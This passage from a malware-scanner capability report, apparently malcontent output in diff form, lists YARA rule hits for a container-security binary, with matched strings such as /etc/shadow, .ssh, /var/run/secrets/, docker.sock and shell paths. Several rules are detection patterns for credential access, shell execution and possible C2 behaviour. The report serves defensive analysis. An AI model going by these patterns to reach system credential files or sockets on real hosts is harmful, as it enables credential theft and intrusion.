0](https://github.com/search?q=Content-Length%3A+0&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd.yara#exec) | executes a command | [evaluateRuntimeCmd](https://github.com/search?q=evaluateRuntimeCmd&type=code)
[isAllowIpRuntimeCommand](https://github.com/search?q=isAllowIpRuntimeCommand&type=code)
[isAllowRuncInitCommand](https://github.com/search?q=isAllowRuncInitCommand&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | +| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) | +| MEDIUM | [fs/file/times/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-times-set.yara#utimes) | [change file last access and modification times](https://linux.die.net/man/2/utimes) | [utimes](https://github.com/search?q=utimes&type=code) | +| MEDIUM | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-chown.yara#Chown) | Changes file ownership | [Chown](https://github.com/search?q=Chown&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [Chmod](https://github.com/search?q=Chmod&type=code)
[chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [kernel/apparmor](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/apparmor.yara#apparmor) | Mentions 'apparmor' | [apparmor](https://github.com/search?q=apparmor&type=code) | +| MEDIUM | [kernel/dev/block/device](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/dev/block-device.yara#block_devices) | works with block devices | [/sys/blocktimestampsdocker](https://github.com/search?q=%2Fsys%2Fblocktimestampsdocker&type=code) | +| MEDIUM | [kernel/dev/loopback](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/dev/loopback.yara#dev_loopback) | access virtual block devices (loopback) | [/dev/loop%dfusermount3low](https://github.com/search?q=%2Fdev%2Floop%25dfusermount3low&type=code) | +| MEDIUM | [kernel/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | +| MEDIUM | [net/bpf](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/bpf.yara#bpf) | BPF (Berkeley Packet Filter) | [bpf](https://github.com/search?q=bpf&type=code) | +| MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | +| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download.yara#download) | download files | [CLUSSnifferDownloadshare](https://github.com/search?q=CLUSSnifferDownloadshare&type=code)
[MaxConcurrentDownloads](https://github.com/search?q=MaxConcurrentDownloads&type=code)
[portsessionsdownloadruleslen](https://github.com/search?q=portsessionsdownloadruleslen&type=code) | +| MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [Cookie](https://github.com/search?q=Cookie&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code) | +| MEDIUM | [net/http/form/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-form-upload.yara#http_form_upload) | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping not acked within timeout](https://github.com/search?q=ping+not+acked+within+timeout&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-parse.yara#ip_go) | parses IP address (IPv4 or IPv6) | [IsLinkLocalUnicast](https://github.com/search?q=IsLinkLocalUnicast&type=code)
[IsSingleIP](https://github.com/search?q=IsSingleIP&type=code) | +| MEDIUM | [net/mac/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code)
[macAddress](https://github.com/search?q=macAddress&type=code) | +| MEDIUM | [net/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | +| MEDIUM | [net/socket/connect](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-connect.yara#_connect) | [initiate a connection on a socket](https://linux.die.net/man/3/connect) | [_connect](https://github.com/search?q=_connect&type=code) | +| MEDIUM | [net/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | +| MEDIUM | [net/stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/stat.yara#netstat) | Uses 'netstat' for network information | [netstatmodinfonil keyde](https://github.com/search?q=netstatmodinfonil+keyde&type=code) | +| MEDIUM | [net/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/upload.yara#upload) | uploads files | [UploadUUID](https://github.com/search?q=UploadUUID&type=code)
[UploadedLayers](https://github.com/search?q=UploadedLayers&type=code)
[uploadCurrentInfo](https://github.com/search?q=uploadCurrentInfo&type=code)
[uploadgoogle](https://github.com/search?q=uploadgoogle&type=code)
[uploads](https://github.com/search?q=uploads&type=code) | +| MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url-encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | +| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url-request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code) | +| MEDIUM | [process/name/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [procfs/arbitrary/pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/mounts/sys](https://github.com/search?q=%2Fproc%2F%25d%2Fmounts%2Fsys&type=code)
[/proc/%d/root/kube](https://github.com/search?q=%2Fproc%2F%25d%2Froot%2Fkube&type=code)
[/proc/%d/rootFA](https://github.com/search?q=%2Fproc%2F%25d%2FrootFA&type=code)
[/proc/%d/task/](https://github.com/search?q=%2Fproc%2F%25d%2Ftask%2F&type=code)
[/proc/%dcopy](https://github.com/search?q=%2Fproc%2F%25dcopy&type=code)
[/proc/%v/stat](https://github.com/search?q=%2Fproc%2F%25v%2Fstat&type=code) | +| MEDIUM | [procfs/cpuinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/cpuinfo.yara#proc_cpuinfo) | get CPU info | [/proc/cpuinfo](https://github.com/search?q=%2Fproc%2Fcpuinfo&type=code) | +| MEDIUM | [procfs/self/cgroup](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/self-cgroup.yara#pid_self_cgroup) | accesses /proc files within own cgroup | [/proc/self/cgroup](https://github.com/search?q=%2Fproc%2Fself%2Fcgroup&type=code) | +| MEDIUM | [procfs/self/mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) | +| MEDIUM | [ref/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/daemon.yara#daemon) | Run as a background daemon | [build-daemon](https://github.com/search?q=build-daemon&type=code)
[docker_daemon](https://github.com/search?q=docker_daemon&type=code) | +| MEDIUM | [ref/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[attachPort](https://github.com/search?q=attachPort&type=code)
[clientPort](https://github.com/search?q=clientPort&type=code)
[cluster_ip](https://github.com/search?q=cluster_ip&type=code)
[del_port](https://github.com/search?q=del_port&type=code)
[detachPort](https://github.com/search?q=detachPort&type=code)
[dstPort](https://github.com/search?q=dstPort&type=code)
[dst_ip](https://github.com/search?q=dst_ip&type=code)
[dst_port](https://github.com/search?q=dst_port&type=code)
[exPort](https://github.com/search?q=exPort&type=code)
[fqdn_ip](https://github.com/search?q=fqdn_ip&type=code)
[global_ip](https://github.com/search?q=global_ip&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[hostIp](https://github.com/search?q=hostIp&type=code)
[hostPort](https://github.com/search?q=hostPort&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inPort](https://github.com/search?q=inPort&type=code)
[in_port](https://github.com/search?q=in_port&type=code)
[ipPort](https://github.com/search?q=ipPort&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[nat_ip](https://github.com/search?q=nat_ip&type=code)
[nat_port](https://github.com/search?q=nat_port&type=code)
[nfq_port](https://github.com/search?q=nfq_port&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[readPort](https://github.com/search?q=readPort&type=code)
[remote_ip](https://github.com/search?q=remote_ip&type=code)
[remote_port](https://github.com/search?q=remote_port&type=code)
[rpcPort](https://github.com/search?q=rpcPort&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[srcPort](https://github.com/search?q=srcPort&type=code)
[src_ip](https://github.com/search?q=src_ip&type=code)
[src_port](https://github.com/search?q=src_port&type=code)
[srvc_port](https://github.com/search?q=srvc_port&type=code)
[syslog_ip](https://github.com/search?q=syslog_ip&type=code)
[syslog_port](https://github.com/search?q=syslog_port&type=code)
[tap_port](https://github.com/search?q=tap_port&type=code)
[unkn_ip](https://github.com/search?q=unkn_ip&type=code)
[unknown_ip](https://github.com/search?q=unknown_ip&type=code) | +| MEDIUM | [ref/path/etc/hosts](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc-hosts.yara#etc_hosts) | references /etc/hosts | [/etc/hosts](https://github.com/search?q=%2Fetc%2Fhosts&type=code) | +| MEDIUM | [ref/path/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/hidden.yara#static_hidden_path) | hidden path in a system directory | [/meminfo/etc/timezone/dev/.udev](https://github.com/search?q=%2Fmeminfo%2Fetc%2Ftimezone%2Fdev%2F.udev&type=code)
[/usr/local/bin/.nvcontainerRunnin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2F.nvcontainerRunnin&type=code) | +| MEDIUM | [ref/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/home.yara#home_path) | references path within /home | [/home/.](https://github.com/search?q=%2Fhome%2F.&type=code) | +| MEDIUM | [ref/path/root](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/root.yara#root_path_val) | path reference within /root | [/root/%shostLookupOrder](https://github.com/search?q=%2Froot%2F%25shostLookupOrder&type=code)
[/root//proc/self/cgroup1192092895507812559604644775390625invalid](https://github.com/search?q=%2Froot%2F%2Fproc%2Fself%2Fcgroup1192092895507812559604644775390625invalid&type=code)
[/root/0x%08xcountsAliyunD.2.14D.3.10D.3.11D.3.12D.3.13D.3.14D.3.15D.3.](https://github.com/search?q=%2Froot%2F0x%2508xcountsAliyunD.2.14D.3.10D.3.11D.3.12D.3.13D.3.14D.3.15D.3.&type=code)
[/root/Switch](https://github.com/search?q=%2Froot%2FSwitch&type=code)
[/root/containers](https://github.com/search?q=%2Froot%2Fcontainers&type=code)
[/root/etc/crio/crio.conf.d/00-default.confUnable](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf.d%2F00-default.confUnable&type=code)
[/root/etc/crio/crio.conf.d/00-defaultRunning](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf.d%2F00-defaultRunning&type=code)
[/root/etc/crio/crio.conf/run/containerd/containerd.sockDirectory](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf%2Frun%2Fcontainerd%2Fcontainerd.sockDirectory&type=code)
[/root/etc/hostnameusr/lib/os-releaseetc/centos-releaseetc/redhat-relea](https://github.com/search?q=%2Froot%2Fetc%2Fhostnameusr%2Flib%2Fos-releaseetc%2Fcentos-releaseetc%2Fredhat-relea&type=code)
[/root/etc/hostsImage](https://github.com/search?q=%2Froot%2Fetc%2FhostsImage&type=code)
[/root/etc/resolv.confFMON](https://github.com/search?q=%2Froot%2Fetc%2Fresolv.confFMON&type=code)
[/root/kube-schedulerUnknown](https://github.com/search?q=%2Froot%2Fkube-schedulerUnknown&type=code)
[/root/sys/fs/aufs/si_%s227373675443232059478759765625SendMsg](https://github.com/search?q=%2Froot%2Fsys%2Ffs%2Faufs%2Fsi_%25s227373675443232059478759765625SendMsg&type=code) | +| MEDIUM | [ref/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/cis-1.8.0//tmp/cis-1.6.0/run](https://github.com/search?q=%2Ftmp%2Fcis-1.8.0%2F%2Ftmp%2Fcis-1.6.0%2Frun&type=code)
[/tmp/container.shfile](https://github.com/search?q=%2Ftmp%2Fcontainer.shfile&type=code)
[/tmp/ctrl_listen.sockFailed](https://github.com/search?q=%2Ftmp%2Fctrl_listen.sockFailed&type=code)
[/tmp/dp_client.%d4e](https://github.com/search?q=%2Ftmp%2Fdp_client.%25d4e&type=code)
[/tmp/dp_listen.sockRead](https://github.com/search?q=%2Ftmp%2Fdp_listen.sockRead&type=code)
[/tmp/host.shInactiveAnonobject/host/block_accessGRP](https://github.com/search?q=%2Ftmp%2Fhost.shInactiveAnonobject%2Fhost%2Fblock_accessGRP&type=code)
[/tmp/kube_master.sh/tmp/kube_worker.sh%sbench/workload/%sGRPC](https://github.com/search?q=%2Ftmp%2Fkube_master.sh%2Ftmp%2Fkube_worker.sh%25sbench%2Fworkload%2F%25sGRPC&type=code)
[/tmp/neuvector/consul.json](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fconsul.json&type=code)
[/tmp/neuvector/raft/peers.json/etc/neuvector/certs/internal/Failed](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fraft%2Fpeers.json%2Fetc%2Fneuvector%2Fcerts%2Finternal%2FFailed&type=code)
[/tmp/neuvectorcan](https://github.com/search?q=%2Ftmp%2Fneuvectorcan&type=code)
[/tmp/ready](https://github.com/search?q=%2Ftmp%2Fready&type=code)
[/tmp/rh-1.4.0//tmp/cis-1.24//tmp/cis-1.23/kube-apiservercontainers](https://github.com/search?q=%2Ftmp%2Frh-1.4.0%2F%2Ftmp%2Fcis-1.24%2F%2Ftmp%2Fcis-1.23%2Fkube-apiservercontainers&type=code)
[/tmp/walkWorkload](https://github.com/search?q=%2Ftmp%2FwalkWorkload&type=code) | +| MEDIUM | [ref/path/usr/local](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-local.yara#usr_local_bin_path) | path reference within /usr/local/bin | [/usr/local/bin/.nvcontainerRunning](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2F.nvcontainerRunning&type=code)
[/usr/local/bin/SHD](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FSHD&type=code)
[/usr/local/bin/admin-assembly-too](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fadmin-assembly-too&type=code)
[/usr/local/bin/agentListenSocket](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FagentListenSocket&type=code)
[/usr/local/bin/consulgrpc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fconsulgrpc&type=code)
[/usr/local/bin/controllercontext](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fcontrollercontext&type=code)
[/usr/local/bin/dpexiting](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fdpexiting&type=code)
[/usr/local/bin/fetcher/usr/local/bin/adapterio.kubernetes.pod.nameFailed](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Ffetcher%2Fusr%2Flocal%2Fbin%2Fadapterio.kubernetes.pod.nameFailed&type=code)
[/usr/local/bin/host.tmplNode](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fhost.tmplNode&type=code)
[/usr/local/bin/kube_master_1_0_0.tmpl/usr/local/bin/kube_worker_1_0_0.tmplresc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_0_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_0_0.tmplresc&type=code)
[/usr/local/bin/kube_master_1_2_0.tmpl/usr/local/bin/kube_worker_1_2_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_2_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_2_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_1_4_1.tmpl/usr/local/bin/kube_worker_1_4_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_4_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_4_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_1_5_1.tmpl/usr/local/bin/kube_worker_1_5_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_5_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_5_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_gke_1_0_0.tmpl/usr/local/bin/kube_worker_gke_1_0_0.](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_gke_1_0_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_gke_1_0_0.&type=code)
[/usr/local/bin/kube_master_ocp_4_3.tmpl/usr/local/bin/kube_worker_ocp_4_3.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_3.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_3.tmpl&type=code)
[/usr/local/bin/kube_master_ocp_4_5.tmpl/usr/local/bin/kube_worker_ocp_4_5.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_5.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_5.tmpl&type=code)
[/usr/local/bin/kube_runner.tmplCannot](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_runner.tmplCannot&type=code)
[/usr/local/bin/kube_worker_1_0_0.tmplreschedule](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_0_0.tmplreschedule&type=code)
[/usr/local/bin/kube_worker_1_2_0.tmpl/usr/local/bin/kube_master_1_0_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_2_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_0_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_1_4_1.tmpl/usr/local/bin/kube_master_1_2_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_4_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_2_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_1_5_1.tmpl/usr/local/bin/kube_master_1_4_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_5_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_4_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_gke_1_0_0.tmplDocker](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_gke_1_0_0.tmplDocker&type=code)
[/usr/local/bin/kube_worker_ocp_4_3.tmplexpected](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_3.tmplexpected&type=code)
[/usr/local/bin/kube_worker_ocp_4_5.tmpl/usr/local/bin/kube_master_ocp_4_3.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_5.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_3.tmpl&type=code)
[/usr/local/bin/kubecis_1_2_0.rem/usr/local/bin/kubecis_1_0_0.remGet](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_2_0.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_0_0.remGet&type=code)
[/usr/local/bin/kubecis_1_4_1.rem/usr/local/bin/kubecis_1_2_0.rem/usr/local/bin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_4_1.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_2_0.rem%2Fusr%2Flocal%2Fbin&type=code)
[/usr/local/bin/kubecis_1_5_1.rem/usr/local/bin/kubecis_1_4_1.rem/usr/local/bin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_5_1.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_4_1.rem%2Fusr%2Flocal%2Fbin&type=code)
[/usr/local/bin/kubecis_1_6_0.remController](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_6_0.remController&type=code)
[/usr/local/bin/kubecis_gke_1_0_0.remDocker](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_gke_1_0_0.remDocker&type=code)
[/usr/local/bin/kubecis_ocp_4_5.rem/usr/local/bin/kubecis_ocp_4_3.remUnable](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_ocp_4_5.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_ocp_4_3.remUnable&type=code)
[/usr/local/bin/monitor/usr/local/bin/fetcher/usr/local/bin/adapterio.kubernete](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fmonitor%2Fusr%2Flocal%2Fbin%2Ffetcher%2Fusr%2Flocal%2Fbin%2Fadapterio.kubernete&type=code)
[/usr/local/bin/nstoolscontainer-docker-bench](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fnstoolscontainer-docker-bench&type=code)
[/usr/local/bin/opacontext.Backgroundentering](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fopacontext.Backgroundentering&type=code)
[/usr/local/bin/pathWalkershare.EnforcerScanServiceScanErrSignatureScanErrorsha](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FpathWalkershare.EnforcerScanServiceScanErrSignatureScanErrorsha&type=code)
[/usr/local/bin/progvar/lib/dpkg/statusno](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fprogvar%2Flib%2Fdpkg%2Fstatusno&type=code)
[/usr/local/bin/rh_runner.tmpl/usr/local/bin/container.tmplRunning](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Frh_runner.tmpl%2Fusr%2Flocal%2Fbin%2Fcontainer.tmplRunning&type=code)
[/usr/local/bin/scannerPROC](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FscannerPROC&type=code)
[/usr/local/bin/scannerTask/sbin/xtables-legacy-multiccBalancerWrapper](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FscannerTask%2Fsbin%2Fxtables-legacy-multiccBalancerWrapper&type=code)
[/usr/local/bin/sigstore-interfacegrpc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fsigstore-interfacegrpc&type=code)
[/usr/local/bin/tcpdumpservice](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Ftcpdumpservice&type=code)
[/usr/local/binFA](https://github.com/search?q=%2Fusr%2Flocal%2FbinFA&type=code) | +| MEDIUM | [ref/path/var/run](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/crio/](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2F&type=code)
[/var/run/docker.sock/](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2F&type=code)
[/var/run/dockershim.sock/](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2F&type=code)
[/var/run/openvswitch/](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2F&type=code)
[/var/run/secrets/](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2F&type=code) | +| MEDIUM | [ref/words/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/exclamation.yara#exclamations) | gets very excited | [not foundNo interface!!](https://github.com/search?q=not+foundNo+interface%21%21&type=code)
[number println!!](https://github.com/search?q=number+println%21%21&type=code)
[ontain alphanumerical characters onlyexplicitly tagged !!](https://github.com/search?q=ontain+alphanumerical+characters+onlyexplicitly+tagged+%21%21&type=code) | +| MEDIUM | [ref/words/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/heartbeat.yara#heartbeat) | references a 'heartbeat' | [TxHeartbeatErrors](https://github.com/search?q=TxHeartbeatErrors&type=code) | +| MEDIUM | [ref/words/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/intercept.yara#interceptor) | References interception | [interceptor](https://github.com/search?q=interceptor&type=code) | +| MEDIUM | [ref/words/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/server_address.yara#server_address) | references a 'server address', possible C2 client | [extensionserverAddressByClientCIDRsdeletionGracePer](https://github.com/search?q=extensionserverAddressByClientCIDRsdeletionGracePer&type=code)
[preconditionsserverAddressincludeObjectfieldSelectorman](https://github.com/search?q=preconditionsserverAddressincludeObjectfieldSelectorman&type=code)
[server_address](https://github.com/search?q=server_address&type=code) | +| MEDIUM | [ref/words/spoof](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/spoof.yara#spoof) | references spoofing | [DeserializeVfSpoofchk](https://github.com/search?q=DeserializeVfSpoofchk&type=code) | +| MEDIUM | [secrets/shadow](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/shadow.yara#etc_shadow) | accesses /etc/shadow | [/etc/shadow](https://github.com/search?q=%2Fetc%2Fshadow&type=code) | +| MEDIUM | [secrets/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [.ssh/usr/local/binFA](https://github.com/search?q=.ssh%2Fusr%2Flocal%2FbinFA&type=code) | +| MEDIUM | [security_controls/linux/iptables](https://github.com/chainguard-dev/malcontent/blob/main/rules/security_controls/linux/iptables.yara#iptables) | [interacts with the iptables firewall](https://www.netfilter.org/projects/iptables/) | [iptables](https://github.com/search?q=iptables&type=code) | +| MEDIUM | [shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/shell/exec.yara#calls_shell) | executes shell | [/bin/bash](https://github.com/search?q=%2Fbin%2Fbash&type=code)
[/bin/dash](https://github.com/search?q=%2Fbin%2Fdash&type=code)
[/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | +| LOW | [compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | +| LOW | [compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | +| LOW | [compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code)
